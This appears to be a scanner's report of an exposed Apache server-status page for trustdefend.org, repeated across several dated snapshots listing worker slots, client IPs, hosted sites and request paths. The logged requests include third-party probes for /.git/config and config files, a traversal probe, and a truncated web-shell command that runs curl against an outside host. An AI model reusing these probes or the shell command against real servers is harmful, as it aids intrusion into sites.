      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Sunday, 14-Apr-2024 03:50:35 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 593
      Parent Server MPM Generation: 592
      Server uptime:  11 days 18 hours 9 minutes 37 seconds
      Server load: 13.45 11.93 10.36
      Total accesses: 18075651 - Total Traffic: 1575.8 GB
      CPU Usage: u26.91 s5.94 cu0 cs0 - .00323% CPU load
      17.8 requests/sec - 1.6 MB/second - 91.4 kB/request
      11 requests currently being processed, 4 idle workers
      G__WWW..WG_.._W.G....G..W..G....................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-591175150/31/818988G
      0.061700.01.2174314.78
      78.107.252.54reportium.ru:8080POST /gw/ HTTP/1.0
      
      1-592200890/25/811857_
      0.040220.00.8873593.61
      95.24.26.200zworkstation.ru:8080GET /webasyst/crm/?module=popup&background_process=1&_=17129928
      
      2-592201220/25/798792_
      0.05000.01.2273831.48
      188.166.108.93trustdefend.org:8080GET /.git/config HTTP/1.0
      
      3-592201690/29/781512W
      0.04000.01.8768787.61
      103.134.154.107akellaweb.com:8080GET /templates/cassiopeia/id.php?cmd=(curl%20-s%20http://reposi
      
      4-592202390/18/766137W
      0.01000.00.5469864.39
      95.108.213.95rgpcs.ru:8080GET /shop/notebooks/gaming-notebooks/17-%D0%BD%D0%BE%D1%83%D1%8
      
      5-592203050/10/763112W
      0.02000.00.4669718.98
      192.0.101.226woostore.ru:8080HEAD / HTTP/1.0
      
      6-591-0/0/744277.
      0.122500.00.0066861.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-591-0/0/735273.
      0.10726810.00.0065423.30
      14.144.12.37jeans123.ru:8080GET / HTTP/1.0
      
      8-592200380/27/723468W
      0.05000.00.4264648.70
      138.68.86.32trustdefend.org:8080GET /server-status HTTP/1.0
      
      9-591174660/54/698699G
      0.131700.020.8562065.81
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      10-592200400/34/681148_
      0.050530.01.9961173.88
      64.124.8.65mapsshop.ru:8080GET /vektornaja_karta_derevni_malaia_uria_mif/data/pictures_tpl
      
      11-591-0/0/667220.
      0.0476630.00.0060794.21
      5.255.231.35cartin.ru:8080GET /blendery/tovar/blender-rawmid-dream-samurai-4hp-bds-04/otz
      
      12-591-0/0/643212.
      0.052800.00.0058597.17
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-592200420/16/619339_
      0.03090.00.4854473.49
      49.43.43.223bannercode.ru:8080GET /banners/f.php?uid=107 HTTP/1.0
      
      14-592200370/12/594332W
      0.02100.00.9151929.91
      5.255.231.51grandkeramika.by:8080GET /index.php?route=product/category&path=76_83_468_545 HTTP/1
      
      15-591-0/0/573813.
      0.111700.00.0051854.59
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-591174710/67/544523G
      0.141900.03.8849423.70
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      17-591-0/0/506853.
      0.052000.00.0046629.07
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-591-0/0/469111.
      0.0373070.00.0041840.63
      37.139.53.60magic-school.net:8080GET / HTTP/1.0
      
      19-590-0/0/440541.
      0.1517597770.00.0040721.50
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      20-591-0/0/400277.
      0.0572150.00.0037311.59
      35.90.100.35beeline-otzyvy.ru:8080GET /profile/martaprime/created/topics/ HTTP/1.0
      
      21-591179010/15/364141G
      0.031700.04.1432889.49
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      22-591-0/0/337756.
      0.057580.00.0029228.68
      64.124.8.65mapsshop.ru:8080GET /vektornaja_karta_hutora_akredasov_mif/data/pictures_tpl/GP
      
      23-591-0/0/299425.
      0.021900.00.0025987.38
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-592200440/19/255410W
      0.03000.00.4923842.34
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      25-591-0/0/236818.
      0.012300.00.0019853.18
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-591-0/0/206506.
      0.0271580.00.0018590.75
      37.139.53.60magic-school.net:8080GET /login/ HTTP/1.0
      
      27-591180340/24/199525G
      0.062200.00.6917378.88
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      28-591-0/0/182239.
      0.062600.00.0016378.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-590-0/0/173107.
      0.029700.00.0015942.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-589-0/0/151659.
      0.04127208740.00.0013400.33
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      31-589-0/0/135181.
      0.0017100.00.0012416.67
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-589-0/0/122494.
      0.0314900.00.0010166.33
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-589-0
      Found on 2024-04-14 00:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb4298b85964

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Monday, 06-Nov-2023 01:45:02 MSK
      Restart Time: Thursday, 02-Nov-2023 03:11:25 MSK
      Parent Server Config. Generation: 144
      Parent Server MPM Generation: 143
      Server uptime:  3 days 22 hours 33 minutes 36 seconds
      Server load: 9.03 9.72 9.61
      Total accesses: 6568287 - Total Traffic: 473.3 GB
      CPU Usage: u16.04 s3.54 cu0 cs0 - .00575% CPU load
      19.3 requests/sec - 1.4 MB/second - 75.6 kB/request
      20 requests currently being processed, 2 idle workers
      WWWWWWWWWWW_WWWWWWW_.......W.W..................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-143115310/56/253015W
      0.132000.03.0018315.72
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      1-14387010/124/249896W
      0.27200.07.9418621.79
      34.138.97.21bluepumpkin.ru:8080GET /inks/calligraphy-inks/?filter_ink-type=finetec-set&query_t
      
      2-143132260/35/248599W
      0.08000.01.5619085.94
      54.184.159.16smart-les.ru:8080GET /shop/pilomateriali/polog/ HTTP/1.0
      
      3-143138660/8/242637W
      0.01000.00.2617467.61
      94.25.170.202ds-hikvision.ru:8080GET /ptz-camers/ HTTP/1.0
      
      4-143108580/84/243517W
      0.23000.04.8418385.75
      177.54.156.62autosoren.ru:8080POST /wp-json/tdw/save_css HTTP/1.0
      
      5-143109770/67/235699W
      0.13000.03.5717695.87
      118.137.58.29megatron.md:8080GET /admin/index.php HTTP/1.0
      
      6-143139510/15/233145W
      0.04000.00.4217526.10
      128.199.61.251trustdefend.org:8080GET /server-status HTTP/1.0
      
      7-143123860/47/226480W
      0.09000.02.4016809.09
      50.112.160.3ritual-moskva.ru:8080GET /catalog/lakirovannye_groby/grob_fkl_svetlyy/ HTTP/1.0
      
      8-143109800/42/222533W
      0.103900.05.3416478.66
      85.192.11.203ecomrussia.ru:8080GET /novosti/2020/mezhdunarodnyij-plas-forum-%c2%abretail-centr
      
      9-143132610/13/220915W
      0.02900.01.4516602.75
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      10-143110260/93/214505W
      0.21000.020.6415869.66
      213.180.203.246mebozon.ru:8080GET /pryamye-divany/divan-pryamoj-betta-4-beg-akkordeon HTTP/1.
      
      11-143124550/60/212776_
      0.11000.02.6115752.47
      178.62.73.12kinderzel.ru:8080GET /s/732323e2232323e27363e2237313/_/;/META-INF/maven/com.atla
      
      12-143110270/72/206582W
      0.18000.013.9615447.69
      213.180.203.114mebozon.ru:8080GET /uglovye-divany/divan-uglovoj-denver-plush-brown HTTP/1.0
      
      13-143129820/12/197671W
      0.01200.00.3914805.30
      83.99.151.65bluepumpkin.ru:8080GET /brand/hamburg/?query_type_brand=or&filter_brand=art-space,
      
      14-143132810/27/194699W
      0.05000.01.1514818.98
      14.215.51.70striptiz24.ru:8080GET /?author=19 HTTP/1.0
      
      15-143132820/22/190615W
      0.06000.00.6113941.92
      176.59.168.26taroclass.ru:8080GET /site.webmanifest HTTP/1.0
      
      16-143140300/5/180187W
      0.01100.00.2113542.29
      47.128.22.25bluepumpkin.ru:8080GET /?ver=1697571452 HTTP/1.0
      
      17-143132850/13/176451W
      0.02300.03.5212719.70
      172.233.142.95volgadekorplit.ru:8080GET /style.php?sig=update&domain=51.79.124.111 HTTP/1.0
      
      18-14366900/164/163545W
      0.39000.020.0612461.37
      93.177.75.210autosoren.ru:8080POST /wp-json/tdw/save_css HTTP/1.0
      
      19-143143300/0/158911_
      0.14000.00.0011664.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-143-0/0/150765.
      0.0117700.00.0010916.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-143-0/0/140474.
      0.0714500.00.0010159.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-143-0/0/130399.
      0.1516000.00.009487.45
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-143-0/0/120986.
      0.1115600.00.009276.49
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-143-0/0/109740.
      0.128900.00.007999.33
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-143-0/0/96888.
      0.0117600.00.007353.39
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-143-0/0/93709.
      0.079200.00.006913.05
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-14376540/79/86739W
      0.221200.08.926538.28
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      28-143-0/0/87236.
      0.323800.00.006633.01
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-14367260/102/74794W
      0.243100.05.105231.45
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      30-143-0/0/72662.
      0.172200.00.005154.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-143-0/0/66175.
      0.2212400.00.004978.50
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-143-0/0/60947.
      0.1511400.00.004242.01
      127.0.0
      Found on 2023-11-05 22:45
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb421b3d7c57

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 26-Oct-2023 18:42:43 MSK
      Restart Time: Thursday, 05-Oct-2023 03:08:42 MSK
      Parent Server Config. Generation: 901
      Parent Server MPM Generation: 900
      Server uptime:  21 days 15 hours 34 minutes
      Server load: 8.77 7.97 7.93
      Total accesses: 58107943 - Total Traffic: 3622.3 GB
      CPU Usage: u258.79 s64.19 cu0 cs0 - .0173% CPU load
      31.1 requests/sec - 2.0 MB/second - 65.4 kB/request
      30 requests currently being processed, 6 idle workers
      WWW_WW_WWWWW_WWW_WWWWWWWWWW__W..WWW.W...W.W.....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-900206850/16/2319439W
      0.042600.00.51151104.17
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      1-900141250/184/2292479W
      0.39300.022.82146937.17
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=761&action=edit HTTP/1.0
      
      2-900205610/31/2264299W
      0.072000.02.14145152.80
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      3-900206860/44/2219886_
      0.1102070.05.13142537.59
      109.252.180.49gbi-24.ru:8080GET /pliti_vp/?rdf-ajax=1&rdf-reload=1&rdf-module=56 HTTP/1.0
      
      4-900156020/105/2183434W
      0.261600.06.85139992.78
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      5-900155000/85/2130677W
      0.15100.013.95138501.97
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=8143&action=edit HTTP/1.0
      
      6-900210330/31/2117399_
      0.05000.01.19136457.09
      137.184.222.107185.240.102.32:8080GET /config.json HTTP/1.0
      
      7-900184610/79/2081119W
      0.18000.08.29134646.92
      65.108.239.104peregorodkirus.ru:8080GET /santekhnicheskie-peregorodki/detskie-peregorodki.html HTTP
      
      8-900189070/48/2027226W
      0.09000.02.92130307.49
      46.138.163.97bankslist.ru:8080GET /wp-json/wp/v2/block-patterns/categories?_locale=user HTTP/
      
      9-900211080/23/1976837W
      0.05700.02.42127216.26
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=9489&action=edit HTTP/1.0
      
      10-900211630/11/1939728W
      0.02500.02.07125914.69
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=4087&action=edit HTTP/1.0
      
      11-900189460/62/1873691W
      0.13700.03.90120807.57
      46.138.163.97bankslist.ru:8080GET /wp-json/wp/v2/block-patterns/patterns?_locale=user HTTP/1.
      
      12-900211850/17/1833663_
      0.0201530.00.78118587.16
      146.190.64.200auditprofi34.ru:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      13-900211860/10/1793363W
      0.03100.01.36115233.27
      46.138.163.97bankslist.ru:8080GET /wp-json/wp/v2/blocks?context=edit&per_page=100&_locale=use
      
      14-900212060/23/1726967W
      0.04100.01.11111185.33
      46.138.163.97bankslist.ru:8080GET /wp-json/wp/v2/ HTTP/1.0
      
      15-900212090/17/1653661W
      0.03000.03.98106686.99
      146.190.64.200trustdefend.org:8080GET /server-status HTTP/1.0
      
      16-900193330/7/1574157_
      0.01088310.01.58102697.98
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=9507&action=edit HTTP/1.0
      
      17-900212100/3/1511586W
      0.001500.00.0598206.05
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      18-900212110/26/1453900W
      0.05200.02.7592938.85
      64.124.8.62spbzaim.ru:8080GET /Retro-Bright-Classical-Cool-Bicycle-Headlight/ HTTP/1.0
      
      19-900170910/188/1342758W
      0.43400.09.2986107.15
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=1347&action=edit HTTP/1.0
      
      20-900212960/9/1267993W
      0.01200.00.4281901.25
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=2240&action=edit HTTP/1.0
      
      21-900130150/281/1192076W
      0.70000.016.5576786.17
      46.138.163.97bankslist.ru:8080GET /wp-json/wp/v2/taxonomies?context=edit&per_page=100&_locale
      
      22-900214220/0/1098102W
      0.19800.00.0071675.09
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=9572&action=edit HTTP/1.0
      
      23-900214480/11/1025694W
      0.01200.04.4066857.31
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=12607&action=edit HTTP/1.0
      
      24-900193360/82/957811W
      0.16200.04.1561166.67
      46.138.163.97bankslist.ru:8080GET /wp-json/wp/v2/themes?context=edit&status=active&_locale=us
      
      25-900214510/1/871569W
      0.00600.00.2455039.52
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=10112&action=edit HTTP/1.0
      
      26-900216040/1/823677W
      0.00000.00.0052041.64
      46.138.163.97bankslist.ru:8080GET /wp-admin/post.php?post=4440&action=edit HTTP/1.0
      
      27-900216280/0/783244_
      0.01000.00.0050796.35
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-900216290/0/726309_
      0.04000.00.0046077.92
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-900193560/57/665001W
      0.161800.05.5442014.92
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      Found on 2023-10-26 15:42
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42a5af2b6f

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Tuesday, 17-Oct-2023 03:40:35 MSK
      Restart Time: Thursday, 05-Oct-2023 03:08:42 MSK
      Parent Server Config. Generation: 561
      Parent Server MPM Generation: 560
      Server uptime:  12 days 31 minutes 53 seconds
      Server load: 10.15 9.24 8.55
      Total accesses: 38512535 - Total Traffic: 2396.9 GB
      CPU Usage: u49.15 s15.92 cu0 cs0 - .00626% CPU load
      37.1 requests/sec - 2.4 MB/second - 65.3 kB/request
      11 requests currently being processed, 4 idle workers
      W_WW__W_WGWWG...G..G............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-560139070/35/1514791W
      0.07000.00.9098496.25
      165.232.76.155trustdefend.org:8080GET /server-status HTTP/1.0
      
      1-560139390/24/1500914_
      0.0504810.01.4795576.89
      213.180.203.49ustami-mladenca.ru:8080GET /catalog/detskie-krovatki/bebi-bum/vedruss/agat/alisa/mibb/
      
      2-560140270/20/1476165W
      0.05000.01.1494729.60
      136.243.228.180francy.ru:8080GET /product/guerlain-idylle-duet-jasmin-lilas/ HTTP/1.0
      
      3-560138990/9/1449062W
      0.02700.00.2892309.90
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-560140620/15/1425126_
      0.0308080.03.9491584.30
      123.13.61.124sleep70.ru:8080GET /detyam/plavki-dlya-devochek-detail HTTP/1.0
      
      5-560141120/19/1388901_
      0.05000.01.4990038.58
      165.22.74.203trustdefend.org:8080GET /login.action HTTP/1.0
      
      6-560142710/9/1387776W
      0.01000.00.6189086.03
      5.253.61.250xn--44-jlcmylbp.xn--p1ai:8080GET /shop/rozi/buket-s-rozoj-nina-25sht/ HTTP/1.0
      
      7-560139010/10/1362488_
      0.03030.00.9888086.21
      localhosttrustdefend.org:8080GET /server-status HTTP/1.0
      
      8-560141550/22/1322275W
      0.04000.00.3884280.44
      104.250.203.178beeline-otzyvy.ru:8080GET /registration/ HTTP/1.0
      
      9-559122310/17/1288404G
      0.052900.04.6981964.34
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-560139030/25/1264117W
      0.07000.01.2581960.45
      95.142.198.138musicinfonews.site:8080GET /feed/ HTTP/1.0
      
      11-560139050/38/1218144W
      0.09000.02.4078343.57
      95.161.221.77yipman.ru:8080GET /xronologiya-zhizni-ip-mana/ HTTP/1.0
      
      12-559116340/55/1207650G
      0.153000.02.4377164.98
      185.240.102.28over-shop.ru:8080GET /index.php?route=extension/module/syncms/OrderAdd&cron= HTT
      
      13-559-0/0/1176833.
      0.061110200.00.0075833.55
      66.249.66.163ehto.ru:8080GET /montazh-elektriki/provodka-v-monolitnyh-domah-osobennosti-
      
      14-559-0/0/1134914.
      0.07113610.00.0073360.79
      95.108.213.88smetano1.ru:8080GET /?yclid=7710547526903176844 HTTP/1.0
      
      15-558-0/0/1085195.
      0.02263600490.00.0069460.88
      85.192.11.242ecomrussia.ru:8080GET /novosti/2020/mezhdunarodnyij-plas-forum-%c2%abretail-centr
      
      16-559118300/54/1025982G
      0.141800.01.9367057.06
      5.253.61.250xn--44-jlcmylbp.xn--p1ai:8080POST /wp-admin/admin-ajax.php?action=rocket_partial_preload&non
      
      17-559-0/0/1004159.
      0.06118890.00.0065033.06
      213.180.203.212krovlyafasady.ru:8080GET /vodostochnye-sistemy/metallicheskii-vodostok/vodostoki-ska
      
      18-559-0/0/948703.
      0.061154620.00.0060724.65
      95.108.213.98plastikovaya-tara.ru:8080GET /evrokontejner-s-dvumya-ruchkami-ed-64-17-2gl/ HTTP/1.0
      
      19-559131170/4/879600G
      0.002800.00.0856171.46
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      20-558-0/0/831482.
      1.108800.00.0053306.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-558-0/0/776095.
      0.0236500.00.0050358.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-558-0/0/729010.
      0.0037900.00.0047111.28
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-558-0/0/680008.
      0.0137100.00.0043883.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-558-0/0/635880.
      0.0336700.00.0040639.05
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-558-0/0/577586.
      0.7320100.00.0036663.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-558-0/0/550409.
      0.0137400.00.0034668.07
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-558-0/0/525603.
      0.8717800.00.0034444.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-558-0/0/493305.
      0.3935100.00.0030972.52
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-558-0/0/448474.
      0.2129700.00.0028563.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-558-0/0/418011.
      0.0037800.00.0025881.37
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-558-0/0/384850.
      0.2436600.00.0024116.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-558-0/0/368275.
      0.0535000.00.0022973.44
      127.0.0
      Found on 2023-10-17 00:40
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb426f137b60

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Tuesday, 17-Oct-2023 03:40:35 MSK
      Restart Time: Thursday, 05-Oct-2023 03:08:42 MSK
      Parent Server Config. Generation: 561
      Parent Server MPM Generation: 560
      Server uptime:  12 days 31 minutes 52 seconds
      Server load: 10.15 9.24 8.55
